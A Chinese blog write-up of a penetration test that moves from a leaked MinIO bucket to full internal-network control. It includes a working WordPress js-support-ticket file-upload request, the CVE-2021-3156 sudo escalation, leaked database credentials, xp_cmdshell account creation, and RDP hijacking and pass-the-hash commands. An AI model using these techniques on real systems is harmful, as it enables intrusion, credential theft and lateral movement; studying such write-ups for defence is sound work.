当前位置: 首页 > backend >正文

从信息泄露到内网控制

0x01 背景

之前常见用rce、文件上传等漏洞获取webshell,偶然遇到一次敏感信息泄露获取权限的渗透,简单记录一下过程。

0x02 信息泄露

发现系统某端口部署了minio服务,经过探测发现存在minio存储桶遍历

图片

使用利用工具把泄露的文件全部整理一下

图片

把文件分类整理后发现 /backup.zip 文件下载后解压,发现 config.php 文件,其中包含数据库连接信息:

DB_USER=admin  
DB_PASS=1qa@xxx135(xxx为公司简称首字母大写)
DB_HOST=127.0.0.1  

本地数据库地址可能有用,先放一放留着,继续进行信息收集。 继续探测发现其他端口发现有个web系统部署了WordPress,其中使用了一套开源票务插件js-support-ticket,存在文件上传漏洞可利用。

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0 ----------767099171
Content-Disposition: form-data; name="action"configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png<?php echo md5(123);unlink(__FILE__);?>
----------767099171-- 

图片

链接webshell获取 www-data 权限

图片

查看系统版本

uname -a
Linux ubuntu-bionic 4.15.0-50-generic #54-Ubuntu SMP Mon May 15 15:20:34 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

目标服务器是Ubuntu 18.04,尝试CVE-2021-3156用于sudo提权。上传并执行获取root权限。

https://github.com/blasty/CVE-2021-3156

利用之前泄露的数据库凭据,成功连接mysql

mysql -h 127.0.0.1 -u root -p -P 3306

查询wp_users表,发现多个md5加密的密码,尝试破解发现其中一个管理员密码可以成功解密,但是尝试用来登录SSH则失败。 按照正常思路找几台内网主机做一下权限维持比较好,尤其是Windows机器用起来更方便,使用Tscan收集内网信息横向移动,存活多台Windows内网主机,但没有发现明显可利用的漏洞。 回顾刚才的数据库密码发现135对应Linux主机内网地址,那么根据已有的Windows主机ip地址推测密码规律,尝试登录成功一台Windows主机

图片

0x03 内网横向

内网横向发现mssql数据库,开xpcmdshell发现为system权限

图片

添加管理员权限账户qax,3389连接获取劫持rdp

图片

已经开启3389远程桌面

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

图片

远程桌面连接rdp劫持获取管理员权限

privilege::debug #提权ts::sessions #查看当前主机的会话token::elevate #提升本地管理员权限为systemts::remote /id:1 #劫持id为1的会话或者privilege::debugsekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

图片

成功登录目标服务器,接下来可以用tscan获取更多内网资产信息。至此完成了从外网渗透到内网控制的全过程。

http://www.xdnf.cn/news/1251.html

相关文章:

  • STM32外部中断与外设中断区别
  • 数据结构——队列
  • 华为交换机命令笔记
  • 【springsecurity oauth2授权中心】将硬编码的参数提出来放到 application.yml 里 P3
  • C++23 中 static_assert 和 if constexpr 的窄化布尔转换
  • Agent智能体ReAct机制深度解读:推理与行动的完美闭环
  • 实战华为1:1方式1 to 2 VLAN映射
  • hbuilderx云打包生成的ipa文件如何上架
  • 发送百度地图的定位
  • 7.6 GitHub Sentinel后端API实战:FastAPI高效集成与性能优化全解析
  • OpenCV中的透视变换方法详解
  • 【AI模型学习】Swin Transformer——优雅的模型
  • 【含文档+PPT+源码】基于微信小程序的健康饮食食谱推荐平台的设计与实现
  • 【微知】git reset --soft --hard以及不加的区别?
  • 入住刚装修好的新房,房间隔音太差应该怎么办?
  • Unity 带碰撞的粒子效果
  • OpenVINO教程(三):使用NNCF进行模型量化加速
  • MATLAB Coder 应用:转换 MATLAB 代码至 C/C++ | 实践步骤与问题解决
  • 【Pandas】pandas DataFrame truediv
  • 【程序员 NLP 入门】词嵌入 - 上下文中的窗口大小是什么意思? (★小白必会版★)
  • RESTful API 设计原则
  • 深度学习基石:神经网络核心知识全解析(一)
  • Curl用法解析
  • 前端频繁调用后端接口问题思考
  • 2025年4月22日(平滑)
  • 【Python笔记 03 】运算符
  • n8n更新1.87后界面报错Connection lost解决
  • 如何精准查询住宅IP?工具、方法与注意事项
  • HTML5+CSS3+JS小实例:CSS太阳动画特效
  • Java 静态内部类面试题与高质量答案合集